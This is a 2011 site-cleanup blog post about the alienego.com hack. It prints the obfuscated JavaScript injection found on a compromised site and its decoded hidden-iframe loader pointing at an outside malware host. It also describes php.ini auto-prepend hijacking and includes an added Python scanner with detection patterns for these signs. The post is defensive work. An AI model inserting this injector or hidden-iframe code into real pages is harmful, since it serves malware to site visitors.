Thursday, June 16, 2011

Cleaning up the alienego.com hack

It seems like there has been a rash of sites getting flagged for the alienego.com hack lately. The alienego hack is an obfuscated JavaScript injection that is hitting all types of sites. If the diagnostic page for your site or the browser warning screen indicates

Malicious software is hosted on 1 domain(s), including alienego.com/.

Here are a couple of things to look for.

Typically with alienego.com the hack consists of some obfuscated JavaScript that appears either at the very beginning of the page, before the doctype declaration or <html> tag or, at the end of the file after the </html> tag, and on occasion right after the <body> tag.  It may also appear in the JavaScript files of the site. This is an example of the code found on one site.

< !-- ad -- > < sc ript > el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,? 0);};ar="seTr > 'm}0 < ECB)c,? Ald]t i1yg{:;\"anupbf.vN/w h9=[o(";ar2="R84c84c88c140c164c188c72c184c56c128c24c4c124c80c144c100c4c80c40c68c4c24c4c124c80c0c48c96c8c120c100c152c120c24c4c188c20c136c184c72c96c20c52c180c32c76c52c104c84c84c84c88c140c12c120c24c4c12c188c52c112c84c84c28c164c4c68c0c4c164c104c84c84c84c72c184c56c128c24c4c124c80c144c160c12c88c80c4c188c116c36c88c140c12c120c24c4c164c0c12c56c176c20c168c80c80c132c108c156c156c120c68c88c4c124c4c100c184c144c56c184c24c156c120c72c148c156c4c100c184c156c140c24c56c128c4c160c4c124c172c144c132c168c132c20c164c160c88c72c80c168c176c20c92c32c20c164c168c4c88c100c168c80c176c20c92c32c20c164c0c80c96c68c4c176c20c148c88c0c88c136c88c68c88c80c96c108c168c88c72c72c4c124c112c132c184c0c88c80c88c184c124c108c120c136c0c184c68c128c80c4c112c68c4c140c80c108c32c112c80c184c132c108c32c112c20c16c36c156c88c140c12c120c24c4c16c116c52c112c84c84c28c84c84c140c128c124c56c80c88c184c124c164c88c140c12c120c24c4c12c188c52c104c84c84c84c148c120c12c164c140c164c176c164c72c184c56c128c24c4c124c80c144c56c12c4c120c80c4c40c68c4c24c4c124c80c188c20c88c140c12c120c24c4c20c52c112c140c144c0c4c80c64c80c80c12c88c136c128c80c4c188c20c0c12c56c20c60c20c168c80c80c132c108c156c156c120c68c88c4c124c4c100c184c144c56c184c24c156c120c72c148c156c4c100c184c156c140c24c56c128c4c160c4c124c172c144c132c168c132c20c52c112c140c144c0c80c96c68c4c144c148c88c0c88c136c88c68c88c80c96c176c20c168c88c72c72c4c124c20c112c140c144c0c80c96c68c4c144c132c184c0c88c80c88c184c124c176c20c120c136c0c184c68c128c80c4c20c112c140c144c0c80c96c68c4c144c68c4c140c80c176c20c32c20c112c140c144c0c80c96c68c4c144c80c184c132c176c20c32c20c112c140c144c0c4c80c64c80c80c12c88c136c128c80c4c188c20c160c88c72c80c168c20c60c20c92c32c20c52c112c140c144c0c4c80c64c80c80c12c88c136c128c80c4c188c20c168c4c88c100c168c80c20c60c20c92c32c20c52c112c84c84c84c72c184c56c128c24c4c124c80c144c100c4c80c
40c68c4c24c4c124c80c0c48c96c8c120c100c152c120c24c4c188c20c136c184c72c96c20c52c180c32c76c144c120c132c132c4c124c72c44c168c88c68c72c188c140c52c112c84c84c28";pau="urn eReferenceErr".re?place(k,? "val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="84";s="";for(i=0;i!=ar2.length;i++){e('po'.concat('s=par',? 'seInt(k',? '.rep',? 'lace("R',? 'eferen',? '",? "0a',? 'sd"))+',? 'ar2[',? 'i]/',? '4'));e('s+=ar.substr(pos,? 1)');}
e(s); < / sc ript > < !-- /ad -- >



If you evaluate the obfuscated JavaScript you get something like the code below: it writes a hidden iframe that loads malicious content from alienego.com.

if (document.getElementsByTagName('body')[0]){
  iframer();
}
else {
  document.write("<iframe src='http://alienego.com/adv/ego/fmcuewen9.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src', 'http://alienego.com/adv/ego/fmcuewen9.php');
  f.style.visibility = 'hidden';
  f.style.position = 'absolute';
  f.style.left = '0';
  f.style.top = '0';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}

On this site the code had been inserted in most of the site's static HTML pages before the doctype declaration. There are some variations of the code; on some sites you will see this line

el.innerHTML="&#00082;&#000101;&#000102;&#000101;&#000114;&#000101;&#000110;&#00099;&#000101;&#00069;&#000114;&#000114;"

instead of this one

el.innerHTML="ReferenceErr";

Start by checking your site's web pages.  If Google has flagged your site they will sometimes provide the URLs of some of the pages that contain the code so check your Webmaster Tools account for any information.  To check the pages I suggest you use an online tool like Redleg's File Viewer. Using an online tool provides a somewhat safer way to check the files and offers the advantage of displaying the content that is being sent to a user's browser. This is particularly useful with dynamic pages such as php pages.

If the malicious code is not showing in the File Viewer you should check any included JavaScript files next. External JavaScript files are normally included using a line of code that, viewed in the File Viewer, will look like this.

<script language="JavaScript" type="text/javascript" src="/shared/pe.js"></script>

The path and filename will be in the src value. Open the file in your editor and check for any blocks of code similar to the example above. Frequently when you get JavaScript from a third party it will be "packed", making it difficult to understand and check. With packed JavaScript files it is often easier to replace them with a known clean copy than to try and clean them up. If you do not have a clean copy you can usually get a fresh clean copy from the original source of the code.

If editing the file is your only option, first make a copy of the file, then make your changes to the original file and check that your page still works correctly and you are not getting any JavaScript errors. You can always restore the file from the backup and try again if there are problems.

Once you have identified the malicious page(s), open the files in your editor and take a look at the contents. Some editors will not display code outside of the <html> tags unless you are in the "edit html" mode. With php pages it is very common for hackers to use obfuscated php code to write the obfuscated JavaScript code. These are typically lines of php code that start out eval(base64_decode(' followed by a long string of seemingly random characters. Hopefully the malicious JavaScript or php code will be visible and it will just be a matter of deleting the code, saving the file and moving on.

If you do not see the code in the source of your pages you will need to do some more looking, because hackers use a number of methods to insert malicious code in a page. You will need to check any external JavaScript files being used in the page; again, open the files in your editor and check for code similar to the example above.

There are a couple of common techniques hackers use to insert code into a file at run-time. For sites running on Apache a hack of the .htaccess is often used. There are some tips on checking the .htaccess file here.

With php sites it is common to hack the php configuration file php.ini. Open the php.ini file and look for these configuration lines

; Automatically add files before PHP document.
; http://php.net/auto-prepend-file
auto_prepend_file =

; Automatically add files after PHP document.
; http://php.net/auto-append-file
auto_append_file =

If the auto_prepend_file = or auto_append_file = line contains a path and filename, for example auto_append_file = /dir/filename.php, locate that file and check its contents for the malicious code, either the JavaScript or obfuscated php code. If the file does not contain any legitimate code you can just remove the path/filename from the php.ini file and then delete the prepended/appended file. If the file contains legitimate content then you will need to clean up the file by deleting the malicious code.
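As an added example (not the author's File Viewer or anything from the original post), the following Python script applies the checks described above to a page's source and to php.ini: a script tag before the doctype or after </html>, the ReferenceErr marker in literal or HTML-entity form, the eval(base64_decode( prefix, a hidden iframe pointing at alienego.com, and auto_prepend_file/auto_append_file lines that name a file. The sample page and php.ini contents are constructed here, and /tmp/x/pre.php is a placeholder path.

```python
import html
import re

# Indicators from the post, written as regexes here (constructed, not the author's).
MARKER_RE = re.compile(r'el\.innerHTML\s*=\s*"([^"]*)"')   # the "ReferenceErr" assignment
EVAL_B64_RE = re.compile(r'eval\s*\(\s*base64_decode\s*\(', re.I)
IFRAME_RE = re.compile(r'<iframe[^>]*alienego\.com', re.I)
SCRIPT_RE = re.compile(r'<\s*script', re.I)
INI_RE = re.compile(r'^\s*(auto_(?:prepend|append)_file)\s*=\s*"?([^"\s;]*)', re.M)

def scan_page(text):
    """Return a list of findings for one HTML/PHP page's source."""
    findings = []
    low = text.lower()
    # A <script> before the doctype or <html> tag is where the dropper usually sits.
    heads = [i for i in (low.find("<!doctype"), low.find("<html")) if i >= 0]
    if heads and SCRIPT_RE.search(text[:min(heads)]):
        findings.append("script before doctype/<html>")
    # Likewise a <script> after the closing </html> tag.
    tail = low.rfind("</html>")
    if tail >= 0 and SCRIPT_RE.search(text[tail:]):
        findings.append("script after </html>")
    # The marker string, whether literal or written as numeric HTML entities.
    for m in MARKER_RE.finditer(text):
        if html.unescape(m.group(1)) == "ReferenceErr":
            findings.append("ReferenceErr marker")
    if EVAL_B64_RE.search(text):
        findings.append("eval(base64_decode( obfuscated PHP")
    if IFRAME_RE.search(text):
        findings.append("hidden iframe to alienego.com")
    return findings

def check_php_ini(text):
    """Return {directive: path} for auto_prepend/append lines that name a file."""
    return {k: v for k, v in INI_RE.findall(text) if v}

# Constructed samples: an injected page, a clean page, and a php.ini with a prepended file.
INFECTED_PAGE = (
    '<!-- ad --><script>el=document.createElement("div");'
    'el.innerHTML="&#00082;&#000101;&#000102;&#000101;&#000114;&#000101;'
    '&#000110;&#00099;&#000101;&#00069;&#000114;&#000114;";</script><!-- /ad -->\n'
    "<!DOCTYPE html><html><body><p>hello</p></body></html>\n"
)
CLEAN_PAGE = '<!DOCTYPE html><html><head><script src="/shared/pe.js"></script></head><body></body></html>\n'
PHP_INI = "; Automatically add files before PHP document.\nauto_prepend_file = /tmp/x/pre.php\nauto_append_file =\n"  # placeholder path

if __name__ == "__main__":
    print(scan_page(INFECTED_PAGE))   # ['script before doctype/<html>', 'ReferenceErr marker']
    print(scan_page(CLEAN_PAGE))      # []
    print(check_php_ini(PHP_INI))     # {'auto_prepend_file': '/tmp/x/pre.php'}
```

To use it on a real site, call scan_page on the contents of each .html, .php and .js file under the document root and check_php_ini on the php.ini the server actually loads; a finding is a place to look, not proof by itself.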

Good Luck!
